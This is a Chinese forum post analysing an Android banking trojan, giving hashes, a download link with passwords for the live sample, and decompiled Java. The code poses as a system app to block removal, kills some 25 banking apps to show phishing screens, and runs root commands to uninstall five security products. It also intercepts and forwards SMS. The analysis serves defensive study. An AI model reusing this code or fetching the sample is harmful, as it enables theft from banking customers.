本帖最后由 kangkai 于 2014-3-2 21:24 编辑
一、 病毒样本基本信息
FileName: b5910a432d2b866e1028f31874edb32f .apk
File MD5: b5910a432d2b866e1028f31874edb32f
SHA1:0CEEB0A29AC4B24E1EFDD0F57ACFC64388CF5AC1
File Size: 829006 Byte
Package:langthing.nend
Download:http://yunpan.cn/Q4qHuRLaNivtd 访问密码 3a90 解压密码:52pojie
// 该病毒首先伪装成系统程序防止卸载;然后试着去卸载安全软件;监测各种银行应用;对需要拦截短信的关键字进行了加密,增加了分析的难度;没有MAIN和LAUNCHER组件,安装后没有图标,防止用户察觉到安装了应用
二、 病毒代码分析
查看AndroidManifest.xml配置文件,可以发现赋予了病毒非常多的权限,且是高危的权限,例如发送短信、拨打电话、读取日志文件、重启应用程序等等,且没有MAIN和LAUNCHER组件
[AppleScript] 纯文本查看 复制代码 <manifest android:versionCode="1" android:versionName="1.1" package="langthing.nend"
xmlns:android="http://schemas.android.com/apk/res/android">
<uses-permission android:name="android.permission.RECEIVE_SMS" /> //接收短信
<uses-permission android:name="android.permission.SEND_SMS" /> //发送短信
<uses-permission android:name="android.permission.READ_SMS" /> //读取短息
<uses-permission android:name="android.permission.WRITE_SMS" /> //编辑短信
<uses-permission android:name="android.permission.SEND_SMS" />
<uses-permission android:name="android.permission.READ_CONTACTS" /> //读取通讯录
<uses-permission android:name="android.permission.WRITE_SETTINGS" /> //读取系统设置的数据库权限
<uses-permission android:name="android.permission.READ_LOGS" /> //读取日志文件
<uses-permission android:name="android.permission.WRITE_CONTACTS" />//编辑通讯录联系人
<uses-permission android:name="android.permission.READ_PHONE_STATE" />//读取电话状态
<uses-permission android:name="android.permission.CALL_PHONE" /> //拨打电话
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />//接收开机信息
<uses-permission android:name="android.permission.GET_TASKS" /> //获取运行程序信息
<uses-permission android:name="android.permission.RESTART_PACKAGES" />//重启应用程序
查看AndroidManifest.xml配置文件,可以发现当手机接收到TReceiver、eviceAdminReceiver、Alarmreceiver等组件时就会启动程序
[AppleScript] 纯文本查看 复制代码 receiver android:name=".TReceiver">
<intent-filter android:priority="2147483647">
<action android:name="android.intent.action.BOOT_COMPLETED" />
</intent-filter>
</receiver>
<receiver android:label="@string/app_name" android:name=".deviceAdminReceiver" android:permission="android.permission.BIND_DEVICE_ADMIN">
<meta-data android:name="android.app.device_admin" android:resource="@xml/device_admin" />
<intent-filter>
<action android:name="android.app.action.DEVICE_ADMIN_ENABLED" />
</intent-filter>
</receiver>
<receiver android:name=".Alarmreceiver">
<intent-filter>
<action android:name="arui.alarm.action" />
</intent-filter>
</receiver>
<receiver android:name=".ShutdownReceiver">
<intent-filter>
<action android:name="android.intent.action.ACTION_SHUTDOWN" />
</intent-filter>
恶意注入代码的代码树如下:
当程序安装后,会伪装成系统程序,防止卸载。如图:
查看langthing.nend.main伪装成系统代码如下: [Java] 纯文本查看 复制代码 private void b()
{
Intent localIntent = new Intent("android.app.action.ADD_DEVICE_ADMIN");
localIntent.putExtra("android.app.extra.DEVICE_ADMIN", this.c);
localIntent.putExtra("android.app.extra.ADD_EXPLANATION", "------ android ------"); // 伪装成系统应用
startActivityForResult(localIntent, 1);
}
当应用监测到银行客户端启动时,就会终止个银行进程,并为工商银行、淘宝等定制了高仿真“钓鱼界面” [Java] 纯文本查看 复制代码 private void e()
{
ComponentName localComponentName = ((ActivityManager.RunningTaskInfo)p.getRunningTasks(1).get(0)).topActivity;
ActivityManager localActivityManager = (ActivityManager)getSystemService("activity");
String str = localComponentName.getClassName();
if ((str.contains("gs.gs")) || (str.contains("js.js")) || (str.contains("jt.jt")) || (str.contains("tb.tb")) || (str.contains("dz.dz")))
{
if (a(getApplicationContext(), "com.icbc"))
localActivityManager.restartPackage("com.icbc");
if (a(getApplicationContext(), "com.chinamworld.main"))
localActivityManager.restartPackage("com.chinamworld.main");
if (a(getApplicationContext(), "com.bankcomm"))
localActivityManager.restartPackage("com.bankcomm");
if (a(getApplicationContext(), "com.taobao.taobao"))
localActivityManager.restartPackage("com.taobao.taobao");
if (a(getApplicationContext(), "com.android.bankabc"))
localActivityManager.restartPackage("com.android.bankabc");
if (a(getApplicationContext(), "cmb.pb"))
localActivityManager.restartPackage("cmb.pb");
if (a(getApplicationContext(), "com.rytong.bankgdb"))
localActivityManager.restartPackage("com.rytong.bankgdb");
if (a(getApplicationContext(), "com.cib.bankcib"))
localActivityManager.restartPackage("com.cib.bankcib");
if (a(getApplicationContext(), "com.rytong.bankps"))
localActivityManager.restartPackage("com.rytong.bankps");
if (a(getApplicationContext(), "cn.com.njcb.android.mobilebank"))
localActivityManager.restartPackage("cn.com.njcb.android.mobilebank");
if (a(getApplicationContext(), "com.ecitic.bank.mobile"))
localActivityManager.restartPackage("com.ecitic.bank.mobile");
if (a(getApplicationContext(), "com.cebbank.bankebb"))
localActivityManager.restartPackage("com.cebbank.bankebb");
if (a(getApplicationContext(), "cn.com.cmbc.mbank"))
localActivityManager.restartPackage("cn.com.cmbc.mbank");
if (a(getApplicationContext(), "cn.com.spdb.mobilebank.per"))
localActivityManager.restartPackage("cn.com.spdb.mobilebank.per");
if (a(getApplicationContext(), "com.pingan.pabank.activity"))
localActivityManager.restartPackage("com.pingan.pabank.activity");
if (a(getApplicationContext(), "com.gzrcb.mobilebank"))
localActivityManager.restartPackage("com.gzrcb.mobilebank");
if (a(getApplicationContext(), "cn.com.cqb.mobilebank.per"))
localActivityManager.restartPackage("cn.com.cqb.mobilebank.per");
if (a(getApplicationContext(), "com.chinamworld.bocmbci"))
localActivityManager.restartPackage("com.chinamworld.bocmbci");
if (a(getApplicationContext(), "com.rytong.app.bankhx"))
localActivityManager.restartPackage("com.rytong.app.bankhx");
if (a(getApplicationContext(), "com.csii.huzhou.mobilebank"))
localActivityManager.restartPackage("com.csii.huzhou.mobilebank");
if (a(getApplicationContext(), "cn.com.shbank.mper"))
localActivityManager.restartPackage("cn.com.shbank.mper");
if (a(getApplicationContext(), "com.rytong.bankqd"))
localActivityManager.restartPackage("com.rytong.bankqd");
if (a(getApplicationContext(), "com.tlbank"))
localActivityManager.restartPackage("com.tlbank");
if (a(getApplicationContext(), "com.sookin.scyh"))
localActivityManager.restartPackage("com.sookin.scyh");
if (a(getApplicationContext(), "cn.com.hzb.mobilebank.per"))
localActivityManager.restartPackage("cn.com.hzb.mobilebank.per");
if (a(getApplicationContext(), "com.chinamworld.klb"))
localActivityManager.restartPackage("com.chinamworld.klb");
}
if (str.contains("icbc"))
{
Cursor localCursor27 = c.a("yh", new String[] { "_id", "mc", "jilu" }, "mc=?", new String[] { "gs" }, null, null, null);
if ((localCursor27.moveToFirst()) && (localCursor27.getInt(localCursor27.getColumnIndex("jilu")) == 0))
{
localActivityManager.restartPackage("com.icbc");
new Intent("android.intent.action.MAIN");
Intent localIntent53 = new Intent("android.intent.action.MAIN");
localIntent53.setFlags(268435456);
localIntent53.addCategory("android.intent.category.HOME");
startActivity(localIntent53);
Intent localIntent54 = new Intent(getApplicationContext(), gs.class);
localIntent54.setFlags(268435456);
startActivity(localIntent54);
}
}
if (str.contains("com.chinamworld.main"))
{
Cursor localCursor26 = c.a("yh", new String[] { "_id", "mc", "jilu" }, "mc=?", new String[] { "js" }, null, null, null);
if ((localCursor26.moveToFirst()) && (localCursor26.getInt(localCursor26.getColumnIndex("jilu")) == 0))
{
localActivityManager.restartPackage("com.chinamworld.main");
new Intent("android.intent.action.MAIN");
Intent localIntent51 = new Intent("android.intent.action.MAIN");
localIntent51.setFlags(268435456);
localIntent51.addCategory("android.intent.category.HOME");
startActivity(localIntent51);
Intent localIntent52 = new Intent(getApplicationContext(), js.class);
localIntent52.setFlags(268435456);
startActivity(localIntent52);
}
}
if (str.contains("bankcomm"))
{
Cursor localCursor25 = c.a("yh", new String[] { "_id", "mc", "jilu" }, "mc=?", new String[] { "jt" }, null, null, null);
if ((localCursor25.moveToFirst()) && (localCursor25.getInt(localCursor25.getColumnIndex("jilu")) == 0))
{
localActivityManager.restartPackage("com.bankcomm");
new Intent("android.intent.action.MAIN");
Intent localIntent49 = new Intent("android.intent.action.MAIN");
localIntent49.setFlags(268435456);
localIntent49.addCategory("android.intent.category.HOME");
startActivity(localIntent49);
Intent localIntent50 = new Intent(getApplicationContext(), jt.class);
localIntent50.setFlags(268435456);
startActivity(localIntent50);
}
}
if (str.contains("taobao"))
{
Cursor localCursor24 = c.a("yh", new String[] { "_id", "mc", "jilu" }, "mc=?", new String[] { "tb" }, null, null, null);
if ((localCursor24.moveToFirst()) && (localCursor24.getInt(localCursor24.getColumnIndex("jilu")) == 0))
{
localActivityManager.restartPackage("com.taobao.taobao");
new Intent("android.intent.action.MAIN");
Intent localIntent47 = new Intent("android.intent.action.MAIN");
localIntent47.setFlags(268435456);
localIntent47.addCategory("android.intent.category.HOME");
startActivity(localIntent47);
Intent localIntent48 = new Intent(getApplicationContext(), tb.class);
localIntent48.setFlags(268435456);
startActivity(localIntent48);
}
// 终止各银行进程
查找安全软件并卸载安全软件 [Java] 纯文本查看 复制代码 for (g = "Already root"; ; g = "NOroot")
{
this.C = 5;
this.E = 5;
this.B = new String[this.C];
this.D = new String[this.E];
this.B[0] = "pm uninstall com.qihoo360.mobilesafe"; //卸载360、腾讯、金山等相关的安全软件
this.B[1] = "pm uninstall com.tencent.qqpimsecure";
this.B[2] = "pm uninstall com.ijinshan.mguard";
this.B[3] = "pm uninstall com.ijinshan.duba";
this.B[4] = "pm uninstall com.anguanjia.safe";
this.D[0] = "com.qihoo360.mobilesafe";
this.D[1] = "com.tencent.qqpimsecure";
this.D[2] = "com.ijinshan.mguard";
this.D[3] = "com.ijinshan.duba";
this.D[4] = "com.anguanjia.safe";
this.s = new o();
拦截相关短信: [Java] 纯文本查看 复制代码 f (i5 == 1)
if ((server.f == 0) && (server.a != i3))
{
server.a(this.a, 1);
server.b(this.a, i3);
str4 = "接收";
server.a(this.a, new o());
String str5 = server.d(this.a).a(this.a.getApplicationContext());
server.a(this.a, new n());
server.g(this.a).a(this.a.getApplicationContext(), str2, str1, str5);
localStringBuilder.append("[ ");
localStringBuilder.append(str1 + ", ");
localStringBuilder.append(i4 + ", ");
localStringBuilder.append(str2 + ", ");
localStringBuilder.append(str3 + ", ");
localStringBuilder.append(str4);
localStringBuilder.append(" ]\n\n");
if (!localCursor1.isClosed())
localCursor1.close();
}
}
while (true)
{
localStringBuilder.append("getSmsInPhone has executed!");
super.onChange(paramBoolean);
return;
server.f = 0;
break;
if (i5 != 2)
break;
if (server.b == i3)
break label760;
Cursor localCursor2 = server.c.a("send", null, null, null, null, null, "_id ASC");
if (localCursor2.moveToFirst())
{
localCursor2.getColumnIndex("_id");
int i6 = localCursor2.getColumnIndex("sSend");
do
server.a(this.a, localCursor2.getString(i6));
while (localCursor2.moveToNext());
}
localCursor2.close();
if (server.h(this.a).equals("1"))
{
server.a(this.a, new o());
server.a(this.a, new n());
String str6 = server.d(this.a).a(this.a.getApplicationContext());
server.a(this.a, str2 + ";" + str1, str6);
}
server.b = i3;
str4 = "发送";
break;
localStringBuilder.append("no result!");
}
}
catch (SQLiteException localSQLiteException)
{
while (true)
{
continue;
label760: String str4 = "null";
}
}
}
}
解密密钥: [Java] 纯文本查看 复制代码 public void a()
{
try
{
InputStream localInputStream = getAssets().open("unhi.db"); // 密钥
FileOutputStream localFileOutputStream = new FileOutputStream(this.q + "unhi.db");
byte[] arrayOfByte = new byte[1024];
while (true)
{
int i1 = localInputStream.read(arrayOfByte);
if (i1 <= 0)
{
localFileOutputStream.flush();
localFileOutputStream.close();
localInputStream.close();
return;
}
localFileOutputStream.write(arrayOfByte, 0, i1);
}
}
catch (Exception localException)
{
}
}
public void a(String paramString)
{
if (!new File(paramString).exists())
a();
}
public void c()
{
new l(this).start();
}
public IBinder onBind(Intent paramIntent)
{
return null;
}
public void onCreate()
{
this.u = new e();
IntentFilter localIntentFilter = new IntentFilter("android.provider.Telephony.SMS_RECEIVED");
localIntentFilter.setPriority(2147483647);
registerReceiver(this.u, localIntentFilter);
p = (ActivityManager)getSystemService("activity");
this.F = 0;
this.j = false;
b(this.s.a(getApplicationContext()), "201305:" + g + ";ver:" + Build.VERSION.RELEASE + ";Model:" + Build.MODEL);
this.q = (getApplicationContext().getFilesDir().getAbsolutePath() + "/");
a(this.q + "unhi.db");
c = new a(this, getApplicationContext().getFilesDir().getAbsolutePath() + "/unhi.db", null, 1);
m localm = new m(this, new Handler());
getContentResolver().registerContentObserver(Uri.parse("content://sms/"), true, localm);
Intent localIntent = new Intent(getApplicationContext(), log.class);
localIntent.setFlags(268435456);
startService(localIntent);
三、 总结 该病毒尝试着去卸载安全软件;采用了加密技术,增加了分析难度;并隐藏运行界面,防止用户察觉。可以看出移动安全问题越演越烈,且手段越来越高明,增加了分析难度。
// 由于本人对于密码学方面还没有Hello World的水平,所以无法解密相关信息,水平有限。
|